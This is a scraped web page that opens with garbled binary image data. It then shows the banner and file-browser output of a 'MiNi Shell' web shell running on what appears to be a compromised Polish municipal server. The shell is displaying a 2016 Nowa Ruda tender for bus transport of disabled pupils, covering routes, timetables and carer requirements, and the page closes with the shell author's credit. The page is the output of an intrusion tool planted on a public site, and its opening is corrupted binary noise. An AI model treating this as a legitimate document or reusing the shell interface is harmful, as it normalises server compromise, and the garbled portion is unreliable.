JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160622/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160622/98599-N-2016.html

<p class="kh_header"><b>Nowa Ruda: Dowóz  uczniów  niepełnosprawnych do szkół  w roku szkolnym 2016/2017.</b><br>
<b>Numer ogłoszenia: 98599 - 2016; data zamieszczenia: 22.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Nowa Ruda , ul. Rynek 1, 57-400 Nowa Ruda, woj. dolnośląskie, tel. 074 8720339, 8720300, faks (074) 872 22 68.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.nowaruda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowóz  uczniów  niepełnosprawnych do szkół  w roku szkolnym 2016/2017..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Świadczenie usług transportowych w roku szkolnym 2016/2017, przewóz  3 grup uczniów:  

Grupa pierwsza przewóz 45  osób  w tym  41 uczniów  +2 opiekunów + 2 rodziców na trasie z Jugowa  przez Świerki przez  Ludwikowice, Nową Rudę- ZSS,   Słupiec, do Szkoły z oddziałami integracyjnymi   w Bożkowie. 

Grupa druga   przewóz 34 osób - w tym 30  uczniów (+ 2 opiekunów+ 2 rodziców )   na trasie z Bożkowa,  przez Dzikowiec,  Słupiec,   Nową Rudę - ZSS, NST,  do Szkoły Specjalnej przy DPS  w Ludwikowicach Kłodzkich.  Powrót  1 ucznia z ZSS do  Słupca należy  wykonać  ok. godz.  12:00   jadąc w kierunku do  Bożkowa na godz. 13:00.     

Trzecia grupa,  3 uczniów  z Gminy Nowa Ruda w tym: 1 uczeń z Jugowa ,  
2 uczniów z Ludwikowic  Kł.  do DPS dowożonych będzie odrębnym dodatkowym kursem  początek o godz. 8:30 -9:00 z DPS Powroty tej  grupy uczniów po lekcjach  należy połączyć z pozostałymi uczniami z tych miejscowości, wyjazd z DPS ok.  godz. ok. 13:45 .

I    Grupa pierwsza, przewóz  45  osób w tym : 41 uczniów wraz z 2 opiekunami + 2 rodzicami opiekunami, na trasie z Jugowa ( 2 uczniów ) przez Świerki ( 1 uczeń ), Ludwikowice  Kłodzkie  (4  uczniów), Drogosław,  Nowa Rudę -  ZSS, Słupiec, do Zespołu Szkolno - Gimnazjalnego z klasami integracyjnymi w Bożkowie.  Sześciu uczniów z tej grupy   dowożonych będzie do  Zespołu Szkół Specjalnych w Nowej Rudzie przy ul. M. Kopernika 8.  ( 4 z Gminy i 2 uczniów z Miasta  N.R).    Pozostałych 35  uczniów w tym: ( 3 z Gminy Nowa Ruda   32 z  Nowej Rudy  i ze Słupca  wraz  2 rodzicami i 2  z opiekunami przewożonych będzie do Bożkowa.) 
1. Wyjazd codziennie w dni nauki szkolnej od poniedziałku do piątku 
Początek Jugów godz. 6:15,  godz. 6:30 Świerki przystanek PKS,  o godz. 6:40 Ludwikowice Kłodzkie (przystanek górny PKS,   przystanek koło Szkoły  DPS  w Ludwikowicach,  godz.6:50 Nowa Ruda Drogosław,  przez ul. Świdnicką,  ( 3 przystanki ) ul. Piłsudskiego, ul. Cmentarna, ul. Rynek,  ul. Armii Krajowej,  ul. Kopernika 8 ( Zespół Szkół Specjalnych),   godz.7: 15 - Nowa Ruda MOK, ul. Żeromskiego, ul. Niepodległości, godz.7.20 Nowa Ruda - Słupiec, przystanek koło Biedronki,  Przystanek ul. Radkowska /skrzyżowanie z ul. Połoniny,   ul. Kłodzka- przystanek obok Intermarche, godz. 7:35, Zespół Szkolno Gimnazjalny w Bożkowie . 
2. Powrót trasą odwrotną, dwa kursy powrotne,  wyjazd z Bożkowa w dni nauki szkolnej, od poniedziałku do piątku - o godz.  13:00   oraz  14:30 . 

Przewożona do Szkoły z oddziałami integracyjnymi w Bożkowie   grupa uczniów,  są to dzieci w wieku 7-16 lat z upośledzeniem  umysłowym w stopniu lekkim, umiarkowanym, z niepełnosprawnością  ruchową i sprzężoną.  
 
II Grupa, przewóz  34 osób - 30  niepełnosprawnych uczniów (+ 2 opiekunów + 2 rodziców )  z  Bożkowa, Słupca, Dzikowca i  Nowej Rudy ,  w tym: do Zespołu Szkół Specjalnych w Nowej Rudzie  (9 uczniów ), do NST przy ul. Stara Droga 4    1 uczeń,   oraz   20  uczniów do   Szkoły Specjalnej przy DPS w Ludwikowicach Kłodzkich.  
1. Wyjazd codziennie w dni nauki szkolnej od poniedziałku do piątku: 
Wyjazd: początek o godz. 7:40 Bożków (Rynek )  (2 uczniów z Bożkowa  + 1 uczeń z ul. Zielonka,  godz. 7:45  Dzikowiec przystanek koło kościoła 2 uczniów, godz. 7:50 Nowa Słupiec ul. Kwiatkowskiego ( 5 uczniów) , ul. Kłodzka- przystanek (4 uczniów),  ul. Wojska Polskiego koło targu  -2 uczniów  - Słupiec, ul Radkowska 49 a    ( 1 uczeń ),   Nowa Ruda,   Słupiec Dolina 1 uczeń, ul. Niepodległości koło Wodociągów 2 uczniów,  przystanek ul. Mickiewicza 1 uczeń,   godz.  8;05, Zespół Szkół Specjalnych  ul. Kopernika 8,  przystanek koło MOK ( 1 uczeń), ul.. Cmentarna (przystanek  koło  starego targu)  (2 uczniów)  ul. Piłsudskiego  przystanek koło Straży Pożarnej godz. 8:10 ,   ul. Świdnicką   (2uczniów ), ul. Jawornik 12, 1 uczeń (wjazd ul. Rolną  godz.  8:15 , Ludwikowice Kłodzkie,  szkoła przy DPS,  godz. 8:30.                
2. Powrót: trasą odwrotną,  wyjazd ze  szkoły  przy DPS  w Ludwikowicach  Kłodzkich   w dni nauki szkolnej, od poniedziałku do piątku - o godz. 15:10, przystanek ul.  Świdnicka  97,  godz. 15:15, ul. Jawornik 12 , NST ul. Stara Droga 4,  ul. Cmentarna (przystanek  koło targu) , ul. Piłsudskiego, przystanek koło Straży Pożarnej, godz. 15:20, godz. 15:25   Nowa Ruda ZSS, godz. 15:30 Przystanek ul. Niepodległości 3, ul. Mickiewicza 4, ul. Niepodległości,  godz. 15:40, ,  godz. 15:45  Nowa Ruda -Dzikowiec,  Słupiec; ul. Kwiatkowskiego (2 przystanki) Dzikowiec, Słupiec, ul. Radkowska 49a, ul. Kłodzka, przystanek obok Intermarche,  godz. 15:55,   godz. 16; 00 Bożków (Rynek)  .

III Grupa  do  DPS - 3 uczniów, 1 uczeń z Jugowa, 2 uczniów z Ludwikowic  do DPS dowożeni będą dodatkowym osobnym kursem o godz. ( 8:30- 9:00)  powrót ze szkoły ww. uczniów połączony będzie z uczniami z kierunku z Bożkowa i ZSS godz.. ok. 13:45 lub 14:45 wyjazd z DPS.   
III grupa dodatkowy kurs   8:30  wyjazd z DPS do Jugowa ul. Małachowskiego37, 1 uczeń na wózku inwalidzkim godz. 8:40, przez   Ludwikowice przystanek górny godz.  8:55,  2 uczniów , przyjazd do DPS Ludwikowice godz. 9:00 . 
Powrót ze szkoły uczniów ze Świerk, Ludwikowic, Jugowa połączony będzie z  pozostałymi uczniami jadącymi  z kierunku z Bożkowa i ZSS,  wyjazd z DPS,. godz.. ok. 13:45 lub 14:45.  
Zamawiający zastrzega sobie prawo  do nieznacznej zmiany czasów odjazdów oraz ustalenia innych miejsc przystanków na trasie przejazdu wynikających z potrzeb dowożonych uczniów. 

Przewożona do  Szkoły Specjalnej przy DPS w Ludwikowicach Kłodzkich  grupy uczniów,  są to dzieci w wieku 4-19 lat z upośledzeniem  umysłowym w stopniu umiarkowanym, głębokim lub  z  niepełnosprawnością  sprzężoną.  
Dzieci z grupy II i III   wymagają szczególnej uwagi i opieki w trakcie przewozu  ze względu  swoje schorzenia !!! 

Przewoźnik zobowiązany jest do dysponowania 2 autobusami o łącznej liczbie miejsc nie mniejszej niż dla 44  osób, w tym 1 autobus  o min.  2 miejscach   dla osób  niepełnosprawnych poruszających się na wózkach inwalidzkich, wyposażony w windę  umożliwiającą wsiadanie i  przewóz 2  osób wózkach inwalidzkich.   Przewoźnik zobowiązany zapewnić foteliki dla dzieci młodszych. 
Zapewnić pomoc przy wsiadaniu i wysiadaniu niepełnosprawnych dzieci.

W związku z tym, że  dowożeni uczniowie są osobami niepełnosprawnymi 
Wykonawca oprócz kierowców zobowiązany jest zapewnić 2 osoby- opiekunów, którzy będą sprawowali  opiekę na przewożonymi uczniami, w czasie wsiadania w trakcie  jazdy i  wysiadania. 
Opiekunowie zobowiązani będą przyjąć dziecko od rodzica, sprawować opiekę w czasie podróży i przekazać po przyjeździe do szkoły,   pod opiekę nauczycielowi lub opiekunowi w szkole,  wyznaczonemu przez dyrektora szkoły. 

W drodze powrotnej ze szkoły do domu powinien przejąć dzieci od nauczyciela lub opiekuna i przekazać pod opiekę rodzica w miejscu wyznaczonego na trasie przejazdu przystanku. 
Przewoźnik sprawuje nadzór nad pracą opiekunów, zapewnia warunki do właściwego wykonania opieki przewożonymi uczniami niepełnosprawnymi.

Osoba pełniąca funkcję opiekuna powinna być  osobą pełnoletnią posiadać dobry stan zdrowia  i spełniać jedno z kryteriów:
1.	Posiadać przygotowanie pedagogiczne,
2.	Posiadać wykształcenie medyczne,
3.	Posiadać ukończony kurs dla kierowników wycieczek szkolnych
4.	Posiadać wykształcenie w zakresie opiekuna społecznego albo pracownika socjalnego,
5.	Posiadać przygotowanie do wykonywania podstawowych czynności pielęgnacyjno- opiekuńczych w stosunku do dzieci, tj. świadectwa potwierdzającego co najmniej odbycie szkolenia w zakresie udzielania pierwszej pomocy medycznej lub przedmedycznej,           
Zamawiający po zawarciu umowy przewozu przekaże  wykonawcy  imienną  listę przewożonych uczniów wraz z adresami i numerami  telefonów kontaktowych do rodziców.  
 Oferent na podstawie  rozkładu jazdy określi zryczałtowaną cenę za 1 dzień świadczonej usługi przewozowej, uwzględniając specyfikę zamówienia, liczbę km, tzw. puste przejazdy, czasy postojów i oczekiwania na kursy powrotne itp.
Każdy oferent może zaoferować tylko jedną cenę.
Należy podać cenę brutto w zł., określając cenę netto i podatek VAT.
W związku z realizacją dowozów wspólnie  z Gminą Nowa Ruda ,  dotyczy dzieci z Jugowa,  Świerk,  Ludwikowic Kłodzkich,  Bożkowa i Dzikowca   dla umożliwienia dokonania  rozliczeń pomiędzy Gminą Nowa Ruda, a Zamawiającym całą trasę  przejazdu podzielono na 5 odcinków. Należy wypełnić  odpowiednio tabelę w formularzu ofertowym,  określić proporcjonalnie w stosunku do długości odcinków, liczby kursów,  cenę netto i brutto za świadczoną usługę  na poszczególnych odcinkach. Suma wyżej wymienionych cen brutto stanowić będzie cenę oferty..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają uprawnienia do wykonywania określonej działalności lub czynności, posiada licencję na świadczenie usług w zakresie transportu drogowego osób</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony jeżeli Wykonawca , wykaże, iż wykonywał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym czasie z należytą starannością - co najmniej: 1 usługi, polegającej na: dowozie uczniów do szkoły (tzw. Przewozów regularnych, w dni nauki szkolnej przez min. 1 rok szkolny). wraz z podaniem, przedmiotu, dat wykonania i podmiotów, na rzecz, których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały one wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaże dysponowanie 2 autobusami o łącznej liczbie miejsc nie mniejszej niż dla 44 osób, w tym 1 autobus o min. 2 miejscach dla osób niepełnosprawnych poruszających się na wózkach inwalidzkich, wyposażony w windę umożliwiającą wsiadanie i przewóz 2 osób wózkach inwalidzkich.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaże min. 2 osoby posiadające uprawnienia zawodowe, prawo jazdy i świadectwo kwalifikacyjne wymagane do wykonywania zawodu kierowcy autobusu w zakresie transportu drogowego, przewozu osób oraz 2 osoby opiekunów spełniające kryteria: Osoba pełniąca funkcję opiekuna powinna być osobą pełnoletnią posiadać dobry stan zdrowia i spełniać jedno z kryteriów: Posiadać przygotowanie pedagogiczne, Posiadać wykształcenie medyczne, Posiadać ukończony kurs dla kierowników wycieczek szkolnych Posiadać wykształcenie w zakresie opiekuna społecznego albo pracownika socjalnego, Posiadać przygotowanie do wykonywania podstawowych czynności pielęgnacyjno- opiekuńczych w stosunku do dzieci, tj. świadectwa potwierdzającego co najmniej odbycie szkolenia w zakresie udzielania pierwszej pomocy medycznej lub przedmedycznej</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony jeśli, wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 99</li>
<li>2 - czas podstawienia autobusu zastępczego - 1</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający na podstawie art. 144 ust 1 ustawy Prawo zamówień publicznych określa następujące okoliczności, które mogą powodować konieczność wprowadzenia zmian w treści zawartej umowy w stosunku do treści złożonej oferty: a) zmiana osób odpowiedzialnych za kontakty i nadzór nad przedmiotem umowy, b) zmiana miejsc przystankowych na trasie przejazdu oraz czasów odjazdu wynikających z potrzeb dowożonych uczniów, c) zmiana trasy przejazdu, powodująca wydłużenie trasy, wynikająca z okoliczności których nie można było przewidzieć, w chwili ogłoszenia przetargu spowoduje prawo, wykonawcy do dodatkowego wynagrodzenia za każdy dodatkowy kilometr proporcjonalnie do liczby kilometrów w przetargu ( 210 km. ) oraz ceny oferty wybranego wykonawcy. d) wystąpienie oczywistych omyłek pisarskich i rachunkowych w treści umowy Powyższe zmiany dopuszczone będą wyłącznie pod warunkiem złożenia wniosku przez Wykonawcę i po akceptacji przez Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.nowaruda.biuletyn.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 57-400 Nowa Ruda, ul. Rynek 1..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.07.2016 godzina 12:00, miejsce: 57-400 Nowa Ruda, ul. Rynek 1..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com